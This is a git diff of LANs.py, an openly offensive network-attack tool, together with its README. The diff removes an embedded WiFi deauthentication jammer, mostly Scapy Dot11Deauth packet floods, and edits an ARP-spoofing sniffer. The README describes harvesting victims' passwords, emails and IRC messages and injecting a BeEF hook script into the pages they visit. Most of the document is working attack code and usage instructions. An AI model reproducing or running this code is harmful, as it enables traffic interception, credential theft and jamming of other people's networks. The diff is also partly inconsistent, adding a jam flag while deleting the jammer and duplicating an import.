diff --git a/.gitignore b/.gitignore
index f383c2a..1d5b427 100644
--- a/.gitignore
+++ b/.gitignore
@@ -1,2 +1,3 @@
*.log.txt
*.pyc
+*.swp
diff --git a/LANs.py b/LANs.py
index d827e96..a67e820 100755
--- a/LANs.py
+++ b/LANs.py
@@ -28,7 +28,6 @@ def module_check(module):
exit('[-] Exiting due to missing dependency')
import os
-
try:
import nfqueue
except Exception:
@@ -37,25 +36,17 @@ except Exception:
import logging
logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
-try:
- from scapy.all import *
-except Exception:
- module_check('scapy')
- from scapy.all import *
+from scapy.all import *
conf.verb = 0
# Below is necessary to receive a response to the DHCP packets because we're sending to 255.255.255.255 but receiving from the IP of the DHCP server
conf.checkIPaddr = 0
-try:
- from twisted.internet import reactor
-except Exception:
- module_check('twisted')
- from twisted.internet import reactor
+from twisted.internet import reactor
+from twisted.internet import reactor
from twisted.internet.interfaces import IReadDescriptor
from twisted.internet.protocol import Protocol, Factory
from sys import exit
from threading import Thread, Lock
import argparse
-import signal
from base64 import b64decode
from subprocess import *
from zlib import decompressobj, decompress
@@ -64,7 +55,7 @@ from cStringIO import StringIO
import requests
import sys
import time
-from signal import SIGINT, signal
+#from signal import SIGINT, signal
import signal
import socket
import fcntl
@@ -117,21 +108,23 @@ def parse_args():
###############################
parser.add_argument("-s", "--skip", help="Skip deauthing this MAC address. Example: -s 00:11:BB:33:44:AA")
parser.add_argument("-ch", "--channel",
- help="Listen on and deauth only clients on the specified channel. Example: -ch 6") #######################################I Changed this!!!###############################3333
+ help="Listen on and deauth only clients on the specified channel. Example: -ch 6")
parser.add_argument("-m", "--maximum",
help="Choose the maximum number of clients to deauth. List of clients will be emptied and repopulated after hitting the limit. Example: -m 5")
parser.add_argument("-no", "--noupdate",
help="Do not clear the deauth list when the maximum (-m) number of client/AP combos is reached. Must be used in conjunction with -m. Example: -m 10 -n",
- action='store_true') #####################I changed this!!!#########################33
+ action='store_true')
parser.add_argument("-t", "--timeinterval",
help="Choose the time interval between packets being sent. Default is as fast as possible. If you see scapy errors like 'no buffer space' try: -t .00001")
parser.add_argument("--packets",
- help="Choose the number of packets to send in each deauth burst. Default value is 1; 1 packet to the client and 1 packet to the AP. Send 2 deauth packets to the client and 2 deauth packets to the AP: -p 2") #####################I changed this!!!!##############################
+ help="Choose the number of packets to send in each deauth burst. Default value is 1; 1 packet to the client and 1 packet to the AP. Send 2 deauth packets to the client and 2 deauth packets to the AP: -p 2")
parser.add_argument("--directedonly",
help="Skip the deauthentication packets to the broadcast address of the access points and only send them to client/AP pairs",
- action='store_true') #######################I changed this!!!########################################3
+ action='store_true')
parser.add_argument("--accesspoint",
- help="Enter the MAC address of a specific access point to target") ##############I changed this!!!##############33
+ help="Enter the MAC address of a specific access point to target")
+ parser.add_argument("--jam",
+ help="Jam all wifi in range", action="store_true")
return parser.parse_args()
#Console colors
@@ -153,6 +146,7 @@ interface = ''
def LANsMain(args):
global victimIP, interface
+
#Find the gateway and interface
ipr = Popen(['/sbin/ip', 'route'], stdout=PIPE, stderr=DN)
ipr = ipr.communicate()[0]
@@ -182,6 +176,7 @@ def LANsMain(args):
au.users(IPprefix, routerIP)
print '\n[*] Turning off monitor mode'
os.system('airmon-ng stop %s >/dev/null 2>&1' % au.monmode)
+ os.system('service network-manager restart')
try:
victimIP = raw_input('[*] Enter the non-router IP to spoof: ')
except KeyboardInterrupt:
@@ -631,9 +626,7 @@ class Parser():
self.cookies(host, header_lines)
def http_parser(self, load, ack, dport):
-
load = repr(load)[1:-1]
-
# Catch fragmented HTTP posts
if dport == 80 and load != '':
if ack == self.oldHTTPack:
@@ -664,15 +657,25 @@ class Parser():
logger.write('[*] ' + url + '\n')
if self.args.urlspy:
- d = ['.jpg', '.jpeg', '.gif', '.png', '.css', '.ico', '.js', '.svg', '.woff']
- if any(i in url for i in d):
- return
- if len(url) > 146:
- print '[*] ' + url[:145]
- logger.write('[*] ' + url[:145] + '\n')
- else:
- print '[*] ' + url
- logger.write('[*] ' + url + '\n')
+ fileFilterList = ['.jpg', '.jpeg', '.gif', '.png', '.css', '.ico', '.js', '.svg', '.woff']
+ domainFilterList = ['adzerk.net', 'adwords.google.com', 'googleads.g.doubleclick.net', 'pagead2.googlesyndication.com']
+ tempURL = url
+ tempURL = tempURL.split("?")[0] #Strip all data (e.g. www.google.com/?g=5 goes to www.google.com/)
+ tempURL = tempURL.strip("/") #Strip all /
+ printURL = True # default to printing URL
+ for fileType in fileFilterList: #Used to check if it is one of the blacklisted file types
+ if tempURL.endswith(fileType):
+ printURL = False #Don't print if it is one of the bad file types
+ for blockedDomain in domainFilterList:
+ if blockedDomain in tempURL:
+ printURL = False #Don't print if it is one of the blocked domains
+ if printURL:
+ if len(url) > 146:
+ print '[*] ' + url[:145]
+ logger.write('[*] ' + url[:145] + '\n')
+ else:
+ print '[*] ' + url
+ logger.write('[*] ' + url + '\n')
# Print search terms
if self.args.post or self.args.urlspy:
@@ -1013,7 +1016,8 @@ class active_users():
def users(self, IPprefix, routerIP):
- print '[*] Running ARP scan to identify users on the network; this may take a minute - [nmap -sn -n %s]' % IPprefix
+ print '[*] Running ARP scan to identify users on the network; this may take a minute'
+ print ' nmap -sn -n %s' % IPprefix
iplist = []
maclist = []
try:
@@ -1047,7 +1051,8 @@ class active_users():
exit('[-] Router MAC not found. Exiting.')
# Do nbtscan for windows netbios names
- print '[*] Running nbtscan to get Windows netbios names - [nbtscan %s]' % IPprefix
+ print '[*] Running nbtscan to get Windows netbios names'
+ print ' nbtscan %s' % IPprefix
try:
nbt = Popen(['nbtscan', IPprefix], stdout=PIPE, stderr=DN)
nbt = nbt.communicate()[0]
@@ -1068,14 +1073,15 @@ class active_users():
a.append(nbtname)
# Start monitor mode
- print '[*] Enabling monitor mode [airmon-ng ' + 'start ' + interface + ']'
try:
- promiscSearch = Popen(['airmon-ng', 'start', '%s' % interface], stdout=PIPE, stderr=DN)
- promisc = promiscSearch.communicate()[0]
- monmodeSearch = re.search('monitor mode enabled on (.+)\)', promisc)
- self.monmode = monmodeSearch.group(1)
+ print '[*] Enabling monitor mode'
+ print ' airmon-ng check kill'
+ os.system('airmon-ng check kill')
+ print ' airmon-ng start ' + interface
+ os.system('airmon-ng start ' + interface)
+ self.monmode = interface+'mon'
except Exception:
- exit('[-] Enabling monitor mode failed, do you have aircrack-ng installed?')
+ exit('[-] Enabling monitor mode failed')
sniff(iface=self.monmode, prn=self.pkt_cb, store=0)
@@ -1200,381 +1206,6 @@ def pcap_handler(args):
Spoof().poison(routerIP, victimIP, routerMAC, victimMAC)
time.sleep(1.5)
-#################################
-####End LANs.py Code#############
-################################
-
-################################
-#####Start wifijammer Code######
-###############################
-
-clients_APs = []
-APs = []
-lock = Lock()
-monitor_on = None
-mon_MAC = ""
-first_pass = 1
-
-
-def wifijammerMain(args):
- confirmJam = raw_input("Are you sure you want to jam WiFi? This may be illegal in your area. (y/n)")
- if "n" in confirmJam:
- exit("Program cancelled.")
- print("Ok. Jamming.")
- mon_iface = get_mon_iface(args)
- conf.iface = mon_iface
- mon_MAC = mon_mac(mon_iface)
-
- # Start channel hopping
- hop = Thread(target=channel_hop, args=(mon_iface, args))
- hop.daemon = True
- hop.start()
-
- signal(SIGINT, stop)
-
- try:
- sniff(iface=mon_iface, store=0, prn=cb)
- except Exception as msg:
- remove_mon_iface(mon_iface)
- print '\n[' + R + '!' + W + '] Closing'
- sys.exit(0)
-
-
-def get_mon_iface(args):
- global monitor_on
- monitors, interfaces = iwconfig()
- if args.interface:
- monitor_on = True
- return args.interface
- if len(monitors) > 0:
- monitor_on = True
- return monitors[0]
- else:
- # Start monitor mode on a wireless interface
- print '[' + G + '*' + W + '] Finding the most powerful interface...'
- interface = get_iface(interfaces)
- monmode = start_mon_mode(interface)
- return monmode
-
-
-def iwconfig():
- monitors = []
- interfaces = {}
- DN = open(os.devnull, 'w')
- proc = Popen(['iwconfig'], stdout=PIPE, stderr=DN)
- for line in proc.communicate()[0].split('\n'):
- if len(line) == 0: continue # Isn't an empty string
- if line[0] != ' ': # Doesn't start with space
- wired_search = re.search('eth[0-9]|em[0-9]|p[1-9]p[1-9]', line)
- if not wired_search: # Isn't wired
- iface = line[:line.find(' ')] # is the interface
- if 'Mode:Monitor' in line:
- monitors.append(iface)
- elif 'IEEE 802.11' in line:
- if "ESSID:\"" in line:
- interfaces[iface] = 1
- else:
- interfaces[iface] = 0
- return monitors, interfaces
-
-
-def get_iface(interfaces):
- scanned_aps = []
- DN = open(os.devnull, 'w')
- if len(interfaces) < 1:
- sys.exit('[' + R + '-' + W + '] No wireless interfaces found, bring one up and try again')
- if len(interfaces) == 1:
- for interface in interfaces:
- return interface
-
- # Find most powerful interface
- for iface in interfaces:
- count = 0
- proc = Popen(['iwlist', iface, 'scan'], stdout=PIPE, stderr=DN)
- for line in proc.communicate()[0].split('\n'):
- if ' - Address:' in line: # first line in iwlist scan for a new AP
- count += 1
- scanned_aps.append((count, iface))
- print '[' + G + '+' + W + '] Networks discovered by ' + G + iface + W + ': ' + T + str(count) + W
- try:
- interface = max(scanned_aps)[1]
- print '[' + G + '+' + W + '] ' + interface + " chosen. Is this ok? [Enter=yes] "
- input = raw_input()
- if input == "" or input == "y" or input == "Y" or input.lower() == "yes":
- return interface
- else:
- interfaceInput = raw_input("What interface would you like to use instead? ")
- if interfaceInput in interfaces:
- return interfaceInput
- else:
- print '[' + R + '!' + W + '] Exiting: Invalid Interface!'
- except Exception as e:
- for iface in interfaces:
- interface = iface
- print '[' + R + '-' + W + '] Minor error:', e
- print ' Starting monitor mode on ' + G + interface + W
- return interface
-
-
-def start_mon_mode(interface):
- print '[' + G + '+' + W + '] Starting monitor mode off ' + G + interface + W
- try:
- os.system('ifconfig %s down' % interface)
- os.system('iwconfig %s mode monitor' % interface)
- os.system('ifconfig %s up' % interface)
- return interface
- except Exception:
- sys.exit('[' + R + '-' + W + '] Could not start monitor mode')
-
-
-def remove_mon_iface(mon_iface):
- os.system('ifconfig %s down' % mon_iface)
- os.system('iwconfig %s mode managed' % mon_iface)
- os.system('ifconfig %s up' % mon_iface)
-
-
-def mon_mac(mon_iface):
- '''
- http://stackoverflow.com/questions/159137/getting-mac-address
- '''
- s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
- info = fcntl.ioctl(s.fileno(), 0x8927, struct.pack('256s', mon_iface[:15]))
- mac = ''.join(['%02x:' % ord(char) for char in info[18:24]])[:-1]
- print '[' + G + '*' + W + '] Monitor mode: ' + G + mon_iface + W + ' - ' + O + mac + W
- return mac
-
-
-def channel_hop(mon_iface, args):
- '''
- First time it runs through the channels it stays on each channel for 5 seconds
- in order to populate the deauth list nicely. After that it goes as fast as it can
- '''
- global monchannel, first_pass
- DN = open(os.devnull, 'w')
- channelNum = 0
- err = None
- while 1:
- if args.channel:
- with lock:
- monchannel = args.channel
- else:
- channelNum += 1
- if channelNum > 11:
- channelNum = 1
- with lock:
- first_pass = 0
- with lock:
- monchannel = str(channelNum)
-
- proc = Popen(['iw', 'dev', mon_iface, 'set', 'channel', monchannel], stdout=DN, stderr=PIPE)
- for line in proc.communicate()[1].split('\n'):
- if len(line) > 2: # iw dev shouldnt display output unless there's an error
- err = '[' + R + '-' + W + '] Channel hopping failed: ' + R + line + W
-
- output(err, monchannel)
- if args.channel:
- time.sleep(.05)
- else:
- # For the first channel hop thru, do not deauth
- if first_pass == 1:
- time.sleep(1)
- continue
-
- deauth(monchannel)
-
-
-def deauth(monchannel):
- '''
- addr1=destination, addr2=source, addr3=bssid, addr4=bssid of gateway if there's
- multi-APs to one gateway. Constantly scans the clients_APs list and
- starts a thread to deauth each instance
- '''
-
- pkts = []
-
- if len(clients_APs) > 0:
- with lock:
- for x in clients_APs:
- client = x[0]
- ap = x[1]
- ch = x[2]
- # Can't add a RadioTap() layer as the first layer or it's a malformed
- # Association request packet?
- # Append the packets to a new list so we don't have to hog the lock
- # type=0, subtype=12?
- if ch == monchannel:
- deauth_pkt1 = Dot11(addr1=client, addr2=ap, addr3=ap) / Dot11Deauth()
- deauth_pkt2 = Dot11(addr1=ap, addr2=client, addr3=client) / Dot11Deauth()
- pkts.append(deauth_pkt1)
- pkts.append(deauth_pkt2)
- if len(APs) > 0:
- if not args.directedonly:
- with lock:
- for a in APs:
- ap = a[0]
- ch = a[1]
- if ch == monchannel:
- deauth_ap = Dot11(addr1='ff:ff:ff:ff:ff:ff', addr2=ap, addr3=ap) / Dot11Deauth()
- pkts.append(deauth_ap)
-
- if len(pkts) > 0:
- # prevent 'no buffer space' scapy error http://goo.gl/6YuJbI
- if not args.timeinterval:
- args.timeinterval = 0
- if not args.packets:
- args.packets = 1
-
- for p in pkts:
- send(p, inter=float(args.timeinterval), count=int(args.packets))
-
-
-def output(err, monchannel):
- os.system('clear')
- mon_iface = get_mon_iface(args)
- if err:
- print err
- else:
- print '[' + G + '+' + W + '] ' + mon_iface + ' channel: ' + G + monchannel + W + '\n'
- if len(clients_APs) > 0:
- print ' Deauthing ch ESSID'
- # Print the deauth list
- with lock:
- for ca in clients_APs:
- if len(ca) > 3:
- print '[' + T + '*' + W + '] ' + O + ca[0] + W + ' - ' + O + ca[1] + W + ' - ' + ca[2].ljust(
- 2) + ' - ' + T + ca[3] + W
- else:
- print '[' + T + '*' + W + '] ' + O + ca[0] + W + ' - ' + O + ca[1] + W + ' - ' + ca[2]
- if len(APs) > 0:
- print '\n Access Points ch ESSID'
- with lock:
- for ap in APs:
- print '[' + T + '*' + W + '] ' + O + ap[0] + W + ' - ' + ap[1].ljust(2) + ' - ' + T + ap[2] + W
- print ''
-
-
-def noise_filter(skip, addr1, addr2):
- # Broadcast, broadcast, IPv6mcast, spanning tree, spanning tree, multicast, broadcast
- ignore = ['ff:ff:ff:ff:ff:ff', '00:00:00:00:00:00', '33:33:00:', '33:33:ff:', '01:80:c2:00:00:00', '01:00:5e:',
- mon_MAC]
- if skip:
- ignore.append(skip)
- for i in ignore:
- if i in addr1 or i in addr2:
- return True
-
-
-def cb(pkt):
- '''
- Look for dot11 packets that aren't to or from broadcast address,
- are type 1 or 2 (control, data), and append the addr1 and addr2
- to the list of deauth targets.
- '''
- global clients_APs, APs
-
- # return these if's keeping clients_APs the same or just reset clients_APs?
- # I like the idea of the tool repopulating the variable more
- if args.maximum:
- if args.noupdate:
- if len(clients_APs) > int(args.maximum):
- return
- else:
- if len(clients_APs) > int(args.maximum):
- with lock:
- clients_APs = []
- APs = []
-
- # We're adding the AP and channel to the deauth list at time of creation rather
- # than updating on the fly in order to avoid costly for loops that require a lock
- if pkt.haslayer(Dot11):
- if pkt.addr1 and pkt.addr2:
-
- # Filter out all other APs and clients if asked
- if args.accesspoint:
- if args.accesspoint not in [pkt.addr1, pkt.addr2]:
- return
-
- # Check if it's added to our AP list
- if pkt.haslayer(Dot11Beacon) or pkt.haslayer(Dot11ProbeResp):
- APs_add(clients_APs, APs, pkt, args.channel)
-
- # Ignore all the noisy packets like spanning tree
- if noise_filter(args.skip, pkt.addr1, pkt.addr2):
- return
-
- # Management = 1, data = 2
- if pkt.type in [1, 2]:
- clients_APs_add(clients_APs, pkt.addr1, pkt.addr2)
-
-
-def APs_add(clients_APs, APs, pkt, chan_arg):
- ssid = pkt[Dot11Elt].info
- bssid = pkt[Dot11].addr3
- try:
- # Thanks to airoscapy for below
- ap_channel = str(ord(pkt[Dot11Elt:3].info))
- # Prevent 5GHz APs from being thrown into the mix
- chans = ['1', '2', '3', '4', '5', '6', '7', '8', '9', '10', '11']
- if ap_channel not in chans:
- return
-
- if chan_arg:
- if ap_channel != chan_arg:
- return
-
- except Exception as e:
- return
-
- if len(APs) == 0:
- with lock:
- return APs.append([bssid, ap_channel, ssid])
- else:
- for b in APs:
- if bssid in b[0]:
- return
- with lock:
- return APs.append([bssid, ap_channel, ssid])
-
-
-def clients_APs_add(clients_APs, addr1, addr2):
- if len(clients_APs) == 0:
- if len(APs) == 0:
- with lock:
- return clients_APs.append([addr1, addr2, monchannel])
- else:
- AP_check(addr1, addr2)
-
- # Append new clients/APs if they're not in the list
- else:
- for ca in clients_APs:
- if addr1 in ca and addr2 in ca:
- return
-
- if len(APs) > 0:
- return AP_check(addr1, addr2)
- else:
- with lock:
- return clients_APs.append([addr1, addr2, monchannel])
-
-
-def AP_check(addr1, addr2):
- for ap in APs:
- if ap[0].lower() in addr1.lower() or ap[0].lower() in addr2.lower():
- with lock:
- return clients_APs.append([addr1, addr2, ap[1], ap[2]])
-
-
-def stop(signal, frame):
- if monitor_on:
- sys.exit('\n[' + R + '!' + W + '] Closing')
- else:
- remove_mon_iface(mon_iface)
- sys.exit('\n[' + R + '!' + W + '] Closing')
-
-#############################
-#####End wifijammer Code#####
-#############################
-
if __name__ == "__main__":
if not os.geteuid() == 0:
@@ -1585,16 +1216,5 @@ if __name__ == "__main__":
if args.pcap:
pcap_handler(args)
exit('[-] Finished parsing pcap file')
- if args.skip is not None or args.channel is not None or args.maximum is not None or args.noupdate is not False or args.timeinterval is not None or args.packets is not None or args.directedonly is not False or args.accesspoint is not None:
- ###If wifijammer arguments are given
- if args.beef is not None or args.code is not None or args.urlspy is not False or args.ipaddress is not None or args.victimmac is not None or args.driftnet is not False or args.verboseURL is not False or args.dnsspoof is not None or args.dnsall is not False or args.setoolkit is not False or args.post is not False or args.nmapaggressive is not False or args.nmap is not False or args.redirectto is not None or args.routerip is not None or args.routermac is not None or args.pcap is not None:
- ###If LANs.py arguments are given
- ###Both LANs.py arguments and wifijammer arguments are given. This will not work since wifijammer jams the network that LANs.py is trying to monitor
- exit('Error. Cannot jam WiFi and monitor WiFi simultaneously')
-
- if args.beef is not None or args.code is not None or args.urlspy is not False or args.ipaddress is not None or args.victimmac is not None or args.driftnet is not False or args.verboseURL is not False or args.dnsspoof is not None or args.dnsall is not False or args.setoolkit is not False or args.post is not False or args.nmapaggressive is not False or args.nmap is not False or args.redirectto is not None or args.routerip is not None or args.routermac is not None or args.pcap is not None:
- ###If LANs.py arguments are given, then run as LANs.py
- LANsMain(args)
else:
- ###If no LANs.py arguments are given, then run as wifijammer (expected behavior of jamming wifi when no arguments given is continued)
- wifijammerMain(args)
+ LANsMain(args)
diff --git a/README.md b/README.md
index a09a72a..43ab9d2 100644
--- a/README.md
+++ b/README.md
@@ -1,20 +1,30 @@
-LANs.py
-========
+If you have any issues running this script I'd suggest checking out [MITMf](https://github.com/byt3bl33d3r/MITMf) which does all the same things + more. Eventually this script needs to be rewritten with net-creds as the engine.
+
+# LANs.py
* Automatically find the most active WLAN users then spy on one of them and/or inject arbitrary HTML/JS into pages they visit.
* Individually poisons the ARP tables of the target box, the router and the DNS server if necessary. Does not poison anyone else on the network. Displays all most the interesting bits of their traffic and can inject custom html into pages they visit. Cleans up after itself.
-* Also can be used to continuosly jam nearby WiFi networks. This has an approximate range of a 1 block radius, but this can vary based off of the strength of your WiFi card. This can be fine tuned to allow jamming of everyone or even just one client. (Cannot jam WiFi and spy simultaneously)
+* Also can be used to continuously jam nearby WiFi networks. This has an approximate range of a 1 block radius, but this can vary based off of the strength of your WiFi card. This can be fine-tuned to allow jamming of everyone or even just one client. Cannot jam WiFi and spy simultaneously.
-Prerequisites: Linux, python-scapy, python-nfqueue (nfqueue-bindings 0.4-3), aircrack-ng, python-twisted, BeEF (optional), nmap, nbtscan, and a wireless card capable of promiscuous mode if you choose not to use the -ip option
-
-Tested on Kali 1.0. In the following examples 192.168.0.5 will be the attacking machine and 192.168.0.10 will be the victim.
+### Prerequisites:
+- Linux
+- `python-scapy`
+- `python-nfqueue` (nfqueue-bindings 0.4-3)
+- `aircrack-ng`
+- `python-twisted`
+- `nmap`
+- `nbtscan`
+- `tcpdump`
+- a wireless card capable of promiscuous mode if you don't know the target's IP address
+- [optional] `BeEf`
+Tested on Kali Linux. In the following examples, 192.168.0.5 will be the attacking machine and 192.168.0.10 will be the victim.
All options:
-``` shell
+```shell
Python LANs.py [-h] [-b BEEF] [-c CODE] [-u] [-ip IPADDRESS] [-vmac VICTIMMAC]
[-d] [-v] [-dns DNSSPOOF] [-a] [-set] [-p] [-na] [-n]
[-i INTERFACE] [-r REDIRECTTO] [-rip ROUTERIP]
@@ -23,42 +33,39 @@ Python LANs.py [-h] [-b BEEF] [-c CODE] [-u] [-ip IPADDRESS] [-vmac VICTIMMAC]
[--directedonly] [--accesspoint ACCESSPOINT]
```
-#Usage
------
+### Usage
+
#### Common usage:
-
-``` shell
+```shell
python LANs.py -u -p
```
-Active target identification which ARP spoofs the chosen target and outputs all the interesting non-HTTPS data they send or request. There's no -ip option so this will ARP scan the network, compare it to a live running promiscuous capture, and list all the clients on the network. Attempts to tag the targets with a Windows netbios name and prints how many data packets they are sending/receiving. The ability to capture data packets they send is very dependent on physical proximity and the power of your network card. Ctrl-C when you're ready and pick your target which it will then ARP spoof.
+Active target identification which ARP spoofs the chosen target and outputs all the interesting non-HTTPS data they send or request. There's no `-ip` option so this will ARP scan the network, compare it to a live running promiscuous capture, and list all the clients on the network. Attempts to tag the targets with a Windows netbios name and prints how many data packets they are sending/receiving. The ability to capture data packets they send is very dependent on physical proximity and the power of your network card. Ctrl-C when you're ready and pick your target which it will then ARP spoof.
+---
-Supports interception and harvesting of data from the following protocols: HTTP, FTP, IMAP, POP3, IRC. Will print the first 135 characters of URLs visited and ignore URLs ending in .jpg, .jpeg, .gif, .css, .ico, .js, .svg, and .woff. Will also print all protocol username/passwords entered, searches made on any site, emails sent/received, and IRC messages sent/received. Screenshot: http://i.imgur.com/kQofTYP.png
+Supports interception and harvesting of data from the following protocols: HTTP, FTP, IMAP, POP3, IRC. Will print the first 135 characters of URLs visited and ignore URLs ending in .jpg, .jpeg, .gif, .css, .ico, .js, .svg, and .woff. Will also print all protocol username/passwords entered, searches made on any site, emails sent/received, and IRC messages sent/received. [Screenshot](http://i.imgur.com/kQofTYP.png)
-Running LANs.py without argument will give you the list of active targets and upon selecting one, it will act as a simple ARP spoofer.
+Running `LANs.py` without argument will give you the list of active targets and upon selecting one, it will act as a simple ARP spoofer.
-### Another common usage:
-
-``` shell
+#### Other common usage:
+```shell
python LANs.py -u -p -d -ip 192.168.0.10
```
--d: open an xterm with driftnet to see all images they view
-
--ip: target this IP address and skip the active targeting at the beginning
+`-d`: open an xterm with driftnet to see all images they view
+`-ip`: target this IP address and skip the active targeting at the beginning
#### HTML injection:
-
-``` shell
+```shell
python LANs.py -b http://192.168.0.5:3000/hook.js
```
-Inject a BeEF hook URL (http://beefproject.com/, tutorial: http://resources.infosecinstitute.com/beef-part-1/) into pages the victim visits. This just wraps the argument in `